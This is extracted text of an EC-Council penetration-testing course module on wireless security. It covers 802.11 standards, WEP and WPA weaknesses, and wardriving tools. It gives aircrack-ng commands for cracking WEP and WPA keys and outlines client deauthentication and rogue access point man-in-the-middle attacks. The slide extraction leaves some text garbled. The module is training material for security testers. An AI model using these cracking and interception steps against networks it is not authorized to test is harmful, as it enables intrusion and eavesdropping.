ecsav4 module 06 advanced wireless testing_norestriction

Advanced Penetration Testing and Security

Analysisy

Module 6Advanced Wireless Testing

EC-CouncilCopyright © by EC-Council

All rights reserved. Reproduction is strictly prohibited

Module Objective

h d l ll f l hThis module will familiarize you with:

• WarDriving with NetStumbler• How NetStumbler Works• “Active” vs. “Passive” WLAN Detection

Disabling the Beacon• Disabling the Beacon• Running NetStumbler• Captured Data Using NetStumbler• Filtering by ChannelsFiltering by Channels• Wireless Penetration Testing with Windows• AirCrack-ng• FMS and Korek attacks



• Crack WEP

Wireless Conceptsp



Wireless Concepts

Wh l ‘Wi l ’ h d h f i When most people say ‘Wireless’ these days, they are referring to one of the 802.11 standards.

Wireless communication allows networks to extend to places Wireless communication allows networks to extend to places that might otherwise go untouched by wired networks.

There are three main 802.11 standards: B, A, and G.There are three main 802.11 standards: B, A, and G.

802.11 has weak authentication and encryption mechanisms.

Wireless, by its very nature, has no well-defined perimeter, making security more challenging.



802.11 Types

• 2mbit/sec theoreticalb /• Uses CSMA/CA for Collision detection and avoidance• Can use either FHSS or DSSS for modulation• Had no well-defined implementation

802.11-Legacy:

• 11mbit/sec theoretical (5.9mbit usually)• Uses DSSS Modulation, splitting the 2.4ghz band into

h l8 b channels• SSID: Service Set Identifier; used for network

differentiation

802.11b:

• Operates in the 5ghz band• Uses OFDM modulation• Theoretical 54mbit, realistic ~25mbit

N t b k d tibl ith b802.11a:



• Not backwards compatible with b• Not widely deployed

802.11 Types (cont’d)

• Back in the 2.4ghz band• Theoretical 54mbit, realistic ~25mbit• Supports CCK (For compatibility with b)

802.11g:Supports CCK (For compatibility with b)

• Natively uses OFDM

• It is based on multiple-in/multiple out (MIMO) technology• Increased data rate up to 600 Mbps• RF band: 2.4 GHz or 5 GHz

802.11n:

• Channel width: 20 MHz or 40 MHz



Core Issues with 802.11

No hard perimeter:

• A wired network runs from point A to point B; a wireless network runs all over the block.

• Eavesdropping and packet sniffing thus become trivial.trivial.

• Many government facilities cannot use wireless, even with higher-layer encryption, for this reason.P i i i i ‘i l d’ b • Perimeter security is sometimes ‘implemented’ by disabling SSID broadcasts. However, ‘stealthed’ networks are still visible.



Core Issues with 802.11 (cont’d)(cont d)

• RF communications are easy to take down:

Performance and easy Denial-of-Service:

co u cat o s a e easy to ta e dow : • Size does matter; The AP with the strongest signal wins

• With CSMA/CA, performance is crippled: • With the addition of WEP, performance drops even further

E h l l d D i l f• Easy access to the local segment means easy targeted Denial-of-Service attacks on the network level: • Packet flooding• ARP Spoofingp g

• No standard for roaming and hand-offs



What’s the Difference?

802.11 802.11a 802.11b 802.11g 802.11n

Frequency 2.4GHz 5 GHz 2.4GHz 2.4GHz 2.4 or 5GHzFrequency 4 5 4 4 4 5

Rate(s) 1 or 2 Mbps

6, 9, 12, 18, 24, 36, 48, 54 Mbps

1, 2, 5.5 or 11 Mbps

6, 9, 12, 18, 24, 36, 48, 54 Mbps

600 Mbps

Modulation FHSS/DSSS

OFDM DSSS OFDM DSSS/OFDM

Effective Data Throughput

1.2 Mbps 32 Mbps 5 Mbps 32 Mbps 100-200 Mbps

g p

Advertised Range

300 ft 225 ft 300 ft 300 ft 600 ft

Encryption Yes Yes Yes Yes Yes

Encryption Type 40 bit RC4 40 or 104 bit RC4

40 or 104 bit RC4

40 or 104 bit RC4

40 or 104 bit RC4

Authentication No No No No Yes

h h h h



Network Support Ethernet Ethernet Ethernet Ethernet WLAN

Other Types of Wireless

HiperLAN2:

• European WLAN standard• 5 GHz range• Up to 54 Mbps

• Short distance device

Bluetooth:

• Short distance device• 2.4 GHz• 721 kbps to 10 Mbps depending on the version

Neither are compatible with 802.11 standards



802.16 – Wireless Metropolitan Area Network

Other Types of Wireless (cont’d)(cont d)

I f d (IR) hi h k t f Infrared (IR), which works at a frequency just below visible light

Narrowband, where data is sent and received on specific frequencies: received on specific frequencies:

• A license must be obtained from the FCC for this spacespace

Spread spectrum technology, which can send data over several frequencies



uniformly

Other Types of Wireless (cont’d)(cont d)



Spread Spectrum Background

Spread spectrum was developed decades ago by the military to send communications that would be hard to detect or jam.

It involves varying the frequency of a signal over a large portion of the spectrum, instead of being focused as in conventional communications:

• It is a large part of the security mathematical sequence. • If the sequence is known, there is no added security, only If the sequence is known, there is no added security, only

survivability.



Channels

The station and AP must communicate over the same channel:

• The channel is configured at the AP.

When a station initializes or moves from one AP to another it will tune into the channel the AP is using:

• The client will tune into the strongest signal available because it ‘thinks’ that that is the closest AP.

When using several APs, they all need to be set to different channels to ensure cross talk does not occur:cross talk does not occur:

• Cross talk is when an AP picks up signals from another AP and its own signals may get corrupted.

• It requires the AP to do more error recovery and signal filtering.



q y g g

Access Point

The access point (AP) bridges the wireless network to the wired network. The access point (AP) bridges the wireless network to the wired network.

The station and AP has to be configured to communicate over the same h lchannel.



Service Set ID

i d i ( )Stations and APs use Service Set IDs (SSIDs):

• SSID is a network name that logically contains ireless stations and APs ithin a specific WLAN wireless stations and APs within a specific WLAN

segment.

The SSID is usually broadcasted by the AP to any y y ylistening hosts.

SSID can represent two network segments.



Service Set ID (cont’d)



Default SSIDs

The following are default SSIDs:

tsunami Cisco

101 3Com, Symbol

RoamAbout Default Network Name Lucent/ Cabletron

Default SSID Baystack 650/660

C C Compaq Compaq

WLAN Addtron, Dlink, SMC

Intel Intel

linksys or Wireless Linksys

Wireless Various



MAC Address SOHOware NetBlaster II

Chipsets

• Well supported in most wireless applicationsPrism II • Well supported in most wireless applications• Linksys, Older DLink

Prism II chipsets:

• Can usually be determined by small N-post adapter on the end of the chipset

• Lucent, Avaya, Enterasys

Orinoco chipsets:

• Usually supported by applications (not Netstumbler)

• Cisco Aironet 350 adaptersCisco chipset:

Cisco Aironet 350 adapters

• Extend the range and reduce the power consumption of 802.11 wireless networksAtheros



consumption of 802.11 wireless networks• AR5004X Clien, AR5004G ClientChipset:

Wi-Fi Equipment



Expedient Antennas

WLAN can also be fun to experiment with.



Vulnerabilities to 802.1x and RADIUSRADIUS

Some early 802.1X implementations cannot use the per-session keys outline in the IEEE 802.1X standard to encrypt the data:

• Such implementations are vulnerable to many of the WEP attacks.

No means of authenticating the access point to the user:

• An attacker can easily spoof an access point and forward a • An attacker can easily spoof an access point and forward a users credential to the RADIUS server.



Vulnerabilities to 802.1x and RADIUS (cont’d)and RADIUS (cont d)

If the RADIUS server is used for authentication methods other than EAP, then the following vulnerabilities can apply:

• The RADIUS shared secret is vulnerable to offline dictionary attack based on capture of the Response Authenticator or

the following vulnerabilities can apply:

attack, based on capture of the Response Authenticator or Message-Authenticator attribute:

• Changing the shared secret between authentication methods will fix the vulnerabilities above.

• RADIUS can still be vulnerable to a brute-force attack.



Vulnerabilities to 802.1x and RADIUS (cont’d)RADIUS (cont d)



Wired Equivalent PrivacyWired Equivalent Privacy



Security - WEP

From ANSI/IEEE Std. 802.11:

“3 49 wired equivalent privacy (WEP): 3.49 wired equivalent privacy (WEP): The optional cryptographic confidentiality algorithm specified by IEEE 802.11 used to provide data confidentiality that is subjectively equivalent to the confidentiality of a wired local area network (LAN) medium that does not employ cryptographic techniques to enhance privacy.”techniques to enhance privacy.



Wired Equivalent Privacy (WEP)(WEP)

Since wireless is inherently easy to eavesdrop on, WEP was created to provide ‘Equivalent Privacy’ to an unsecured created to provide Equivalent Privacy to an unsecured wired network.

WEP has three main goals:WEP has three main goals:

• Preventing casual eavesdroppingConfidentiality:

Control who is allowed to access • Control who is allowed to access the networkAccess control:

E th t t



• Ensure that messages are not tampered with Data integrity:

Wired Equivalent Policy (WEP) (cont’d)(WEP) (cont d)

S f t b t WEP

• WEP uses RC4 for encryption and CRC32 f h k

Some facts about WEP:

RC4

for integrity checking.• WEP uses either 40 or 104 bit keys, which

are then added to a 24 bit initialization vector (which just happens to be vector (which just happens to be transmitted in the clear).

• WEP uses a shared key structure.• WEP significantly impacts network • WEP significantly impacts network

performance.



Wired Equivalent Policy (WEP) (cont’d)(WEP) (cont d)

If working under SKA, a WEP key is required for authentication:

• The key can also be used for data encryption• The key can also be used for data encryption.

RC4 is a symmetric algorithm which only encrypts the payload of packets:payload of packets:

• RC4 does not encrypt the header or trailer data.• The same key is used for encryption and decryption processes.y yp yp p

The 802.11 standard specifies a 40-bit key and many vendors also offer a 104-bit key.



Exclusive OR

Exclusive OR (XOR) functionality: XOR is an operation that is applied to t o bits

• A function in binary mathematics. If both bits are the same, the result is zero (1 + 1 = 0).

operation that is applied to two bits:

• If the bits are different than each other, the result is one (1 + 0 = 1).

Logical “either/or”:

• Output is true if either, but not both, of inputs are true.Output is false if both inputs are false or both inputs are true

Logical either/or :

• Output is false if both inputs are false or both inputs are true.

Major function in all of cryptography.



Encryption Process

Message

Character Character Character Character

1010101 1101001 1100001 00110101010101 1101001 1100001 00110101101001 0010101 1101011 00101110111100 1111100 0001010 0001101

XOR function



Values determined by key Resulting ciphertext

Encryption Process (cont’d)



Chipping Sequence

1

Random sequence: 0100101101011001

Data stream: 1010

0

0

1

q

XOR of the two: 10111011101010010

1



WEP Issues

CRC32 is not sufficient to ensure complete cryptographic integrity of a CRC32 is not sufficient to ensure complete cryptographic integrity of a packet:

• By capturing two packets, an attacker can reliably flip a bit in the encrypted stream and modify the checksum so that the packet is accepted stream, and modify the checksum so that the packet is accepted.

IV’s are 24 bits:

• An AP broadcasting 1500 byte packets at 11 mb/s would exhaust the entire IV space in five hours.

Known plaintext attacks:

• When there is an IV collision, it becomes possible to reconstruct the RC4 k b d ff f h d h d d l d f h k



keystream based off of the IV and the decrypted payload of the packet.

WEP Issues (cont’d)

i i k P dDictionary attacks:

• WEP is password-based

Password

Denial-of-Services:

i d di i h i d • Associate and disassociate messages are not authenticated

Eventually, an attacker can construct a decryption table of reconstructed key streams:y

• With about 24 GB of space, an attacker can use this table to decrypt WEP Packets in real-time



WEP Issues (cont’d)

A lack of centralized key management makes it difficult to change WEP A lack of centralized key management makes it difficult to change WEP keys with any regularity.

IV is a value that is used to randomize the key stream value and each IV is a value that is used to randomize the key stream value and each packet has an IV value:

• The standard only allows 24 bits, which can be used up within hours at a busy APAP.

• IV values will be reused.

The standard does not dictate that each packet must have a unique IV, so vendors use only a small part of the available 24-bit possibilities:

• A mechanism that depends on randomness is not very random at all and attackers can easily figure out the key stream and decrypt other messages.



WEP - Authentication Phase

When a wireless station wants to access a network, it sends a probe prequest packet on all channels so that any AP in range will respond.

The AP responds with packets containing the

• When open system authentication (OSA) is configured, the station

The AP responds with packets containing the AP’s SSID and other network information:

will send an authentication request to the AP and the AP will make an access decision based on its policy.

• When shared key authentication (SKA) is configured, the AP will send a challenge to the station and the mobile station encrypts it send a challenge to the station and the mobile station encrypts it with its WEP key and sends it back to the AP:• If the AP can successfully decrypt, and obtain the challenge value the

mobile station’s access is authorized.



WEP - Shared Key Authentication

The requesting station sends the challenge text.

The receiving station:

• Decrypts the challenge using the same shared key• Decrypts the challenge using the same shared key.• Compares it to the challenge text sent earlier.• If they match, an acknowledgement is sent.• If no match sends a negative authentication noticeIf no match, sends a negative authentication notice.

Once acknowledged, the transmission is sent.



Receiving StationReceiving StationRequesting StationRequesting Station

WEP - Association Phase

After the authentication phase, the station will send the AP an association request packet.

If the AP has a policy to allow this station to access the network, it will i t th t ti t it lf b l i th t ti i it i ti t blassociate the station to itself by placing the station in its association table.

A wireless device has to be associated with an AP to access network resources and not just authenticatedresources, and not just authenticated.

The authentication and association phases authorize the device, and not the userthe user.

There is no way to know if an unauthorized user has stolen and is using an authorized device.



authorized device.

WEP Flaws

Two basic flaws undermine its ability to protect against a serious attack. wo bas c aws u de e ts ab ty to p otect aga st a se ous attac .

No defined method for encryption key distribution:

• Pre-shared keys were set once at installation and are rarely (if ever) changed.

Use of RC4 which was designed to be a one time cipher and not intended Use of RC4, which was designed to be a one-time cipher and not intended for multiple message use:

• Since the pre-shared key is rarely changed, the same key is reused.A tt k it t ffi d fi d h l t k t th • An attacker monitors traffic and finds enough examples to work out the plaintext from message context.

• With knowledge of the ciphertext and plaintext, you can compute the key.



WEP Attack

It takes at least 10,000 packets to discover the key:

A l t f k d t i th f t t f • A large amount of known data is the fastest way of determining as many key streams as possible.

Wep Weggie (part of BSD Airtools) can be used to Wep Weggie (part of BSD-Airtools) can be used to generate a large number of small packets:

• The information may be as innocuous as the fields in h l h d h DNS the protocol header or the DNS name query.

• Monitoring is passive and therefore undetectable.• Simple tools and instructions are readily available to

recover the key



recover the key.

Wireless Security y

Technologies



WPA Interim 802.11 Security

Wi-Fi Protected Access (WPA)

Interim Solution between WEP and 802.11i:

• Plugs holes in legacy 802.11 devices• Typically requires firmware or driver upgrade, but not

new hardware• Subset of the 802.11i and is forward compatible

Sponsored by the Wi-Fi Alliance:

Will i WPA f ifi i• Will require WPA for current certifications

Support announced by Microsoft, Intel, others



WPA

Works similarly to 802.1X authentication:

• Both clients and AP must be WPA-enabled for encryption to and from 802.1X EAP serverKey in a passphrase (master key) in both client and AP

y

• Key in a passphrase (master key) in both client and AP• If passphrase matches, then AP allows entry to the network• Passphrase remains constant, but a new encryption key is generated

for each session



WPA2 (Wi-Fi Protected Access 2)

WPA2 is compatible with the 802.11i standard.

WPA2 provides government grade security by implementing the National Institute of Standards and Technology (NIST) FIPS 140-2 compliant AES encryption algorithm.

WPA2 offers two mode of operation:

• Enterprise: Verifies network users through a server.• Personal: Protects unauthorized network access by utilizing a set-up

password.



802.1X Authentication and EAPand EAP

802 1X:

• Framework to control port access between clients, the AP, and servers

802.1X:

Uses Extensible Authentication Protocol (EAP):

• EAP is discussed in RFC 2284 • Uses dynamic keys instead of the static WEP authentication key• Requires mutual authentication protocolRequires mutual authentication protocol• User’s transmission must go through WLAN AP to reach the server

performing the authentication:• Permits number of authentication methods

RADIUS i th k t d f t t d d



• RADIUS is the market de facto standard

EAP Types

EAP-TLS:

• EAP is an extension of PPP providing for additional authentication methods.

• TLS provides for mutual authentication and session key exchange.

• Negotiated mutual key becomes master key for 802.11 TKIP.R i li d ifi (PKI b d)• Requires client and server certificates (PKI-based).

• Deployed by Microsoft for its corporate network.• Shipping in Windows 2000 and XP.

i di d i• EAP-TLS is discussed in RFC 2716.



Cisco LEAP

Lightweight Extensible Authentication Protocol

In August 2003 it was discovered that Cisco LEAP is vulnerable to brute-In August 2003, it was discovered that Cisco LEAP is vulnerable to brute-force and dictionary attacks:

• Therefore, Cisco warns users to adhere to strong passwords.

Use PEAP (Protected Extensible Authentication Protocol) instead of LEAP, which supports:

• Digital certificates. • One-time passwords.



TKIP (Temporal Key Integrity Protocol)Integrity Protocol)

Q i k fi h f i k bl Quick fix to overcome the reuse of encryption key problem with WEP

Still uses WEP RC4 but changes temporal key every 10K Still uses WEP RC4, but changes temporal key every 10K packets

Mandates use of MIC to prevent packet forgeryMandates use of MIC to prevent packet forgery

Uses existing device calculation capabilities to perform the ti tiencryption operations

Improves security, but is still only a short-term fix



Wireless Networks Testing

This is a method for testing wireless access to a LAN and gis becoming increasingly popular.

However, some fairly alarming problems, security-wise, , y g p b , y ,are common when implementing these technologies.

Expected results:

• The outer-most physical edge of the wireless network.• The logical boundaries of the wireless network.

Expected results:

The logical boundaries of the wireless network.• Access points into the network.• IP range (and possibly DHCP-server) of the wireless network.• Exploitable "mobile units" (clients).



Wireless Networks Testing (cont’d)(cont d)

Verify the distance in which the wireless communication extends beyond the physical boundaries of the organizationboundaries of the organization

List equipment needed/tried (antenna, card, amplifier, software, etc.)

Verify authentication-method of the clients

Verify that encryption is configured and running

Verify what key length is used

Verify the IP range of the networkVerify the IP-range of the network

Verify the IP-range and reachable from the wireless network, and the protocols involved



Probe network for possible DoS problems

Wireless Communications TestingCommunications Testing

This is a method of testing cordless communication d i hi h d h h i l d i d devices which may exceed the physical and monitored boundaries of an organization.

• The outer-most physical edge of the wireless communications

Expected results:

communications.• The logical boundaries of the wireless

communications.• List of communication types.yp• Type of wireless communication used and in what

spectrum.• List of frequencies emanating from the target.

Li t f l biliti i th i l



• List of vulnerabilities in the wireless communication present.

Report Recommendations

Verify that the organization has an adequate security policy that addresses the use of wireless technology including the use of 802 11use of wireless technology, including the use of 802.11.

Maintain a complete inventory of all wireless devices on the network.

Evaluate the physical access controls to Access Points (APs) and devices controlling them.

Determine if APs are turned off during portions of the day when they will not be in use .

Verify that the AP SSIDs have been changed.



Verify that all wireless clients have anti-virus software installed.

Wireless Attack Countermeasures

Enable 104-bit WEP

Change default SSID and disable its broadcast

I l t th l f th ti ti Implement another layer of authentication

Physically put AP at the center of the building

Logically put the AP in a DMZ with a firewall between the DMZ and internal network

Implement VPN for wireless stations to usep

Configure an ACL on AP and/or firewall to allow only known addresses into the network



Assign static IPs to stations and disable DHCP

Wireless Penetration Testing with Windows with Windows

The first step in performing a wireless penetration test is The first step in performing a wireless penetration test is determining which wireless network is the target.

This is usually done by conducting a WarDrive.

Once you’ve determined the correct network to attack, you need to break any encryption used on the network.

Once the security is broken sniff for sensitive traffic.



Att k d T lAttacks and Tools



War Driving

War Driving is performed on a laptop/PC with a wireless NIC, antenna (omni directional is best) sniffers (TCPDump antenna (omni-directional is best), sniffers (TCPDump, Ethereal), NetStumbler, and AirSnort or WEPCrack.

NetStumbler finds WLAN APs and logs:

• Network name• SSID• MAC address of AP• Channel heard on• Signal strength• Signal strength• If WEP is enabled

AirSnort and WEPCrack runs algorithms on captured traffic to k WEP k



crack WEP keys.

War Driving (cont’d)



The Jargon – WarChalking

A marking method is only as good as the number of people that know it.

There is a common standard being developed amongst warchalkers to offer a common marking scheme.

Check out www.warchalking.org for more details.



The Jargon –WarChalking (cont’d)WarChalking (cont d)

Bumper Sticker:Bumper Sticker:



WarPumpkin

WLAN hackers can adapt to seasonal changes:

• Open WLAN, SSID=GoAway, Speed=1.5Mbps

p g



Wireless: Tools of the Trade

• Kismet• Netstumbler

Detectors:

• AirsnortCrackers:

• WEPCrackCrackers:

• MonkeyJack• AirJack

MITM tools:



Mapping with Kismet

Kismet is a Linux wireless tool

It’s free

C ll k i dCaptures all packets received

Supports GPS and mapping

Logging is flexible and configurable

Installation can be difficultInstallation can be difficult

Requires driver and kernel patches



Included with Knoppix

Mapping with Kismet (cont’d)

Comes with own gpsmap program

Does signal strength guessing and Not so accurate

gpsmap programg ginterpolation



Kismet: Screenshot



WarDriving with NetStumbler

NetStumbler is the application used most by WarDriverspp ythat use a Windows operating system.

While originally designed as a wireless network tool, NetStumbler has grown in popularity due to WarDrivers.

NetStumbler provides radio frequency (RF) signal information and other data related to combining computers and radios.

It also provides information on the band and data format being used depending on which wireless networking card



being used, depending on which wireless networking card is being implemented (802.11b, 802.11a, or 802.11g).

How Does NetStumbler Work?

NetStumbler is an active wireless network detection application that does not i l li t f i bpassively listen for, or receive, beacons.

It does not collect packets.

If it detects an infrastructure WLAN, it requests the AP’s name.

When it finds an ad-hoc WLAN, it requests the names of all of the peers it sees.

Its interface provides filtering and analysis toolsIts interface provides filtering and analysis tools.



NetStumbler: Screenshot



“Active” vs. “Passive” WLAN DetectionWLAN Detection

NetStumbler is an “active” wireless network detection application that takes a specific action to accomplish application that takes a specific action to accomplish WLAN detection.

This action sends out a specific data probe called a Probe p pRequest.

The Probe Request frame and the associated Probe b q bResponse frame are part of the 802.11 standard.

Applications that employ “passive” detection do not Applications that employ passive detection do not broadcast any signals.

These programs listen to the radio band for any 802.11



These programs listen to the radio band for any 802.11 traffic that is within range of the wireless card.

Disabling the Beacon

NetStumbler transmits a Broadcast Request probe to discover the WLAN.q p

Most access points respond to a Broadcast Request by default.

When the access point responds, it transmits its SSID, MAC number, and other information.

Many brands and models of access points allow this feature to be disabled.

Once an access point ceases to respond to a request, NetStumbler can no longer detect it.

If d ’t t WLAN t h th f th N tSt bl



If you don’t want your WLAN to show up on the screen of another NetStumbler user, disable the SSID broadcast on your access point.

Running NetStumbler

When NetStumbler starts, it immediately attempts to locate a usable wireless card and a global positioning system (GPS) receiver.

The application also opens a new file with extension ns1 (NetStumbler1)The application also opens a new file with extension ns1 (NetStumbler1).

The file name is derived from the date and time when NetStumbler was started, and is in the YYYMMDDHHMMSS. ns1 format.

If a wireless card is located, the program begins to scan for nearby access If a wireless card is located, the program begins to scan for nearby access points.

The data from any located access points is immediately entered into the



The data from any located access points is immediately entered into the new file.

Captured Data using NetStumblerNetStumbler



Filtering by Channels



Airsnort



WEPCrack



Monkey-Jack

Attacker launches DoS attackAttacker launches DoS attack

Victim’s 802.11 card scans channels to search for new AP

Victim’s 802.11 card associates with fake AP on the attack machine

A k hi i i h l APAttack machine associates with real AP

Attack machine is now inserted and can pass frames h h i h i h



through in a manner that is transparent to the upper level protocols

How Monkey-Jack Works

k hNo per-packet authentication:

• Client or AP can easily be spoofed

Client station will actively scan for new AP after being disassociated

Attacker impersonates AP:

• Offers authentication

Legitimate AP is clueless



Before Monkey-Jack



After Monkey-Jack



Monkey-Jack: Screenshot



AirCrack-ng

AirCrack-ng is available from www.aircrack-ng.org

Aircrack-ng is an 802.11 WEP and WPA/WPA2-PSK key cracking program.

Aircrack-ng can recover the WEP key once enough encrypted packets have been captured with airodump-ngng.

Aircrack-ng suite performs various statistical attacks to discover the WEP key with small amounts of captured data combined with brute forcing.

For cracking WPA/WPA2 pre shared keys a dictionary method is used For cracking WPA/WPA2 pre-shared keys, a dictionary method is used.



AirCrack-ng: How Does it Work?How Does it Work?

Multiple techniques are combined to crack the WEP key:

• FMS ( Fluhrer, Mantin, Shamir) attacks - statistical techniques • Korek attacks - statistical techniques• Brute force

When using the statistical techniques to crack a WEP key, each byte of the key is basically handled individually.

i i i l h i h ibili h i b i h k i d i hUsing statistical mathematics, the possibility that a certain byte in the key is guessed right goes up to as much as 15% when you capture the right initialization vector (IV) for a particular key byte.

Certain IVs “leak” the secret WEP key for particular key bytes.



This is the fundamental basis of the statistical techniques.

AirCrack-ng:FMS and Korek AttacksFMS and Korek Attacks

By using a series of statistical tests called the FMS and Korek attacks, votes are accumulated for likely keys for each key byte of the secret WEP keyfor likely keys for each key byte of the secret WEP key.

Different attacks have a different number of votes associated with them since the probability of each attack yielding the right answer varies mathematically.

The more votes a particular potential key value accumulates, the more likely it is to be correct.

For each key byte, the screen shows the likely secret key and the number of votes it has For each key byte, the screen shows the likely secret key and the number of votes it has accumulated so far.

The secret key with the largest number of votes is most likely correct but is not guaranteed.

The techniques and the approach above do not work for WPA/WPA2 pre-shared keys.



The only way to crack these pre-shared keys is via a dictionary attack.

AirCrack-ng:Crack WEPCrack WEP

To crack WEP, start by opening a console window. On the command line, To crack WEP, start by opening a console window. On the command line, launch AirCrack-ng using the following syntax:

•aircrack-ng –a 1 filename.cap

You can specify multiple input files (either in .cap or .ivs format).

You can run both airodump-ng and aircrack-ng at the same time: aircrack-ng will auto-update when new IVs are available.



AirCrack-ng:Available OptionsAvailable Options



AirCrack-ng:Usage ExamplesUsage Examples



AirCrack-ng: Cracking WPA/WPA2 PassphrasesWPA/WPA2 Passphrases

aircrack-ng -w password.lst *.capWhere: Where:

-w password.lst is the name of the password file. Remember to specify the full path if the file is not located in the same directory.*.cap is the name of a group of files containing the ivs.p g p g

You can use wildcard * to include multiple files.



AirCrack-ng: Cracking WPA/ WPA2 Passphrases (cont’d)WPA2 Passphrases (cont d)



AirCrack-ng: Notes

Don’t try to crack the WEP key until you have 200,000 IVs or more.y y y ,

If you start too early, aircrack tends to spend too much time brute forcing keys and not properly applying the statistical techniques.p p y pp y g q

Start by trying 64 bit keys “aircrack-ng -n 64 captured-data.cap”.

If they are using a 64 bit WEP, it can usually be cracked in less then 5 minutes (generally less then 60 seconds) with relatively few IVs.

If you know the start of the WEP key in hexadecimal, you can enter it with the “-d” parameter.

L t k th WEP k i “ 6 8 ” i h d i l th



Let us assume you know the WEP key is “0123456789” in hexadecimal, then you could use “-d 01” or “-d 0123”, etc.

Determining Network Topology: Network ViewNetwork View

Once you’ve gained access to the actual wireless y gnetwork, it helps to know the network topology, including the names of other computers and the devices on the network.

Network View is a small program that is designed to locate network devices and routes using TCP/IP, DNS, SNMP i N BIOS d Wi d SNMP, port scanning, NetBIOS, and Windows Management Interface.

NetworkView will scan a complete 128-node Class C network in just a few minutes.



Network View



WarDriving and Wireless Penetration Testing with OS XPenetration Testing with OS X

Apple OS X, WarDriving and Wireless Local Area Network (WLAN) i i h ll i l d l l penetration testing have excellent wireless support and several tools to

make these tasks easy.

• KisMAC is aWarDriving and WLAN discovery and penetration testing tool available on any platform and is available for free at

WarDriving with KisMAC:

testing tool available on any platform, and is available for free at http://kismac.binaervarianz.de/

• Most WarDriving applications provide the capability to discover networks in either active mode or passive mode; KisMAC provides both.

• KisMAC is unique because it also includes the functionality that a penetration tester needs to attack and compromise found networks.



KisMAC



KisMAC (cont’d)



Using a GPS

Most GPS devices capable of National Marine Electronics Association (NMEA) output work with KisMACoutput, work with KisMAC.

Many of these devices are only available with serial cables.

In most cases, you will need to purchase a serial-to-USB adapter in order to connect your GPS to your Mac.

Most of these adapters come with drivers for OS X; thus, make sure that the one you purchase includes these drivers.

You may be able to use a USB GPS cable and eliminate the need for a USB-to-You may be able to use a USB GPS cable and eliminate the need for a USB-to-serial adapter.

The GPS Store sells these cables at: htt // th t /d t il ? d t id GL



http://www.thegpsstore.com/detail.asp?product_id=GL0997

Attacking WEP with KisMAC

Since you have determined that WEP is being used on your target wireless network, you now have to decide how you want to crack the key. KisMAC has three network, you now have to decide how you want to crack the key. KisMAC has three primary methods of WEP cracking built in:

• Wordlist attacks.• Weak scheduling attacks.• Bruteforce attacks.

To use one of these attacks, you have to generate enough initialization vectors (IVs) for the attack to work.

The easiest way to do this is by reinjecting traffic, which is usually accomplished by capturing an Address Resolution Protocol (ARP) packet, spoofing the sender, and

di i b k h isending it back to the access point.

This generates a large amount of traffic that can then be captured and decoded.



Deauthenticating Clients

h l h lDeauthenticating clients with KisMAC is simple.

Before you can begin deauthenticating, you must lock KisMAC to the specific channel that your target network is using.

If KisMAC is successful in its attempt to deauthenticate, the dialog changes to note the BSSID of the access point it is deauthenticating BSSID of the access point it is deauthenticating.

During the time the deauthentication is occurring,



clients cannot use the wireless network.

Attacking WPA withKisMACKisMAC

Unlike WEP, which requires a large amount of traffic be generated in order to crack the key, cracking WPA only requires that you capture the four-way Extensible Authentication Protocol Over Local Area Network only requires that you capture the four way Extensible Authentication Protocol Over Local Area Network (EAPOL) handshake at authentication.

Unlike cracking WEP, the WPA attack is an offline dictionary attack, which means that when you use KisMAC to crack a WPA pre-shared key (or passphrase), you only need to capture a small amount of traffic; p y ( p p ), y y p ;the actual attack can be carried out later, even when you are out of range of the access point.

To attempt a dictionary attack against KisMAC, you may need to deauthenticate clients.

When attempting dictionary attacks against WPA, everything can be done from one host, which will cause the client to disassociate from the network and force them to reconnectthe client to disassociate from the network and force them to reconnect.

This requires the four-way EAPOL handshake to be transmitted again.



Attacking WPA with KisMAC (cont’d)KisMAC (cont d)



Brute-Force Attacks Against 40-bit WEP40 bit WEP

KisMAC includes functionality to perform y pBruteforce attacks against 40-bit WEP keys.

There are four ways KisMAC can accomplish this:

• All possible charactersAl h i h l• Alphanumeric characters only

• Lowercase letters only• Newshams 21-bit attack

Each of these attacks is very effective, but also very time and processor intensive.



Wordlist Attacks

KisMAC provides the functionality to perform many types of dl k dd kwordlist attacks in addition to WPA attacks.

Cisco developed the Lightweight Extensible Authentication Protocol (LEAP) to help organizations concerned about Protocol (LEAP) to help organizations concerned about vulnerabilities in WEP.

LEAP is also vulnerable to wordlist attacks similar to WPALEAP is also vulnerable to wordlist attacks similar to WPA.

Ki MAC f dli t tt k i t LEAPKisMAC can perform wordlist attacks against LEAP.

Wordlist attacks can be launched against 40- and 104-bit



Apple keys or 104-bit Message Digest 5 (MD5) keys in the same manner.

Mapping WarDrives with StumbVerterStumbVerter

StumbVerter takes input data from NetStumbler and plots the access i t f d Mi ft M P i t points found on Microsoft MapPoint maps.

The logged WAPs will be shown with small icons their color and shape The logged WAPs will be shown with small icons, their color and shape relating to WEP mode and signal strength.



StumbVerter



MITM Attack



MITM Attack Design

A basic MITM attack connects a wireless client to a client’s (victim’s) access, and then forwards the traffic to the real (authorized) AP.

Components required:

The target—AP(s):

• To successfully perform a MITM attack, an attacker needs one or more target APs.

The target—AP(s):

The victim—wireless client(s):

• Wireless clients or the victim(s) of the MITM attack have an initial wireless connection to the target AP.• During the MITM attack, we will disconnect the victim from the target AP and have them associate to

the MITM AP.

( )

• The MITM attack platform provides access point functionality for wireless client(s) that were originally connected to a target AP.

h k l f f d h l d l h h l

The MITM attack platform:



• The MITM attack platform is configured with almost identical settings as the target AP, so that a client cannot tell the difference between the attacker’s access point and the real (authorized) access point.

MITM Attack Design (cont’d)



MITM Attack Variables

To successfully perform a MITM attack against a wireless network, a few variables i t lcome into play.

The first variable is how the target AP is configured; specifically, what security features are enabled on the access point to prevent unauthorized access.features are enabled on the access point to prevent unauthorized access.

Before an attack can begin, the following tasks must be accomplished:

• Locate one or more AP(s) with wireless clients already attached.• Identify the security controls and encryption scheme enabled on the target access point.• Circumvent the security controls and associate to the target access point.

To establish connectivity and forward client traffic back to the target wireless network, you must be able to circumvent the security controls of the target AP.

If ’t d thi ’t f d th li t’ t ffi b k t th t t



If you can’t do this, you can’t forward the client’s traffic back to the target access point.

Hardware for the Attack:Antennas, Amps, and WiFi Cardste as, ps, a d W Ca ds

To successfully perform a MITM attack, you need several pieces of hardware and a few key software programs.

A typical MITM attack platform utilizes the f ll i h d

• A laptop computer with two personal computer memory cards.• International Association (PCMCIA) slots

following hardware components:

• International Association (PCMCIA) slots.• Two wireless Network Interface Cards (NICs).• An external antenna (omni-directional preferred).• A bi-directional amplifier (optional).p ( p )• Pigtails to connect the external antennae to the amplifier and

wireless NIC.• A handheld global positioning system (GPS) unit (optional).

A i



• A power inverter.

